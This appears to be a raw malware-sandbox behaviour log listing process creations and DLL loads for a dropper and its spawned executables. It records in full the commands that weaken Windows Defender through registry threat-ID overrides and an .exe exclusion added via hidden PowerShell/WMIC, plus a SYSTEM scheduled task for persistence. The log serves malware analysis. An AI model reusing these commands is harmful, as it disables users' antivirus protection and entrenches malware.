Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: webio.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: acgenral.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: samcli.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: msacm32.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: aclayers.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sfc.dll
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: msimg32.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cscapi.dll
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: samcli.dll
